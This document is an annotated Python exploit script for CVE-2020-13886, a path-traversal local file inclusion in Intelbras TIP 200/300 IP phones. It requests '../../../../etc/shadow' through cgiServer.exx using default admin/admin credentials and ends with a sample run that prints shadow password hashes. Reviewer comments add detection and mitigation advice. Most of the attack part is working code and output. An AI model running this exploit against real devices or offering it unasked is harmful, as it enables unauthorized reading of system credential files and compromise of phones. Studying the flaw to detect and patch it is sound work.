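# Exploit Title: LFI - Intelbras TIP 200 / TIP 200 LITE / TIP 300
# Date: 12/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: intelbras.com
# Version: 60.61.75.15 / 65.61.75.22
# Tested on: 60.61.75.15 / 65.61.75.22
# CVE : CVE-2020-13886
#
# Reviewer notes:
# - What the transcript at the end of this file shows: a GET to
#   /cgi-bin/cgiServer.exx whose `page` query parameter holds a relative
#   path with `../` segments returns the contents of /etc/shadow. The
#   parameter value is therefore presumably used as a file path without
#   being confined to the web content directory (inferred from the
#   transcript; the firmware code is not shown here).
# - /etc/shadow being readable suggests the CGI handler runs with
#   root-level read access -- TODO confirm on the device.
# - The request is sent with HTTP Basic credentials admin/admin. Nothing in
#   this file shows the read working without valid credentials.
# - Detection: in web/proxy logs, look for requests to cgiServer.exx whose
#   `page` value contains `..` path segments.
# - Mitigation: keep the phone's web interface reachable only from a
#   management network, replace the admin/admin credentials, check with the
#   vendor for firmware newer than the versions listed above, and treat
#   password hashes stored on an affected device as exposed.

import urllib.parse
import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth


def poc():
    """Prompt for a URL prefix and a path, request it, and print the response.

    Reads two values from stdin: the URL up to and including the vulnerable
    parameter (e.g. ``.../cgi-bin/cgiServer.exx?page=``) and the path to
    append. An empty path falls back to ``../../../../etc/shadow``. The two
    strings are concatenated and fetched with HTTP Basic authentication using
    the hard-coded credentials ``admin`` / ``admin``; the response body is
    printed as text.

    Returns:
        None. A transport failure (timeout, refused connection, bad URL) is
        reported on stdout instead of raising.
    """
    print("""
    -------------------------------------------------------------------------------------------------------------
    ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ---------------------------
    ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT -----------------------------
    -------------------------------------------------------------------------------------------------------------\n""")

    url = input("URL parameter ->")
    payload = input("LFI payload -> ")
    if not payload:
        payload = "../../../../etc/shadow"

    # NOTE(review): the return value of quote() is discarded, so this call has
    # no effect and the path is concatenated exactly as typed. Left as the
    # author wrote it so the request on the wire is unchanged.
    urllib.parse.quote(payload)

    try:
        # A timeout keeps the script from hanging forever on an unreachable
        # or unresponsive device (requests has no default timeout).
        r = http.get(
            str(url) + str(payload),
            auth=HTTPBasicAuth('admin', 'admin'),
            timeout=10,
        )
    except http.RequestException as exc:
        print(f"Request failed: {exc}")
        return

    print(" ")
    text = r.text
    print(text)


# Runs at import time as well as when executed as a script (as published).
poc()

# Sample run from the author's test device (transcript as published):
#root@skull:~/home# python p0c.py
# -------------------------------------------------------------------------------------------------------------
# ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
# ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
# -------------------------------------------------------------------------------------------------------------
#URL parameter -> http://192.168.0.207/cgi-bin/cgiServer.exx?page=
#LFI payload -> ../../../../etc/shadow
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::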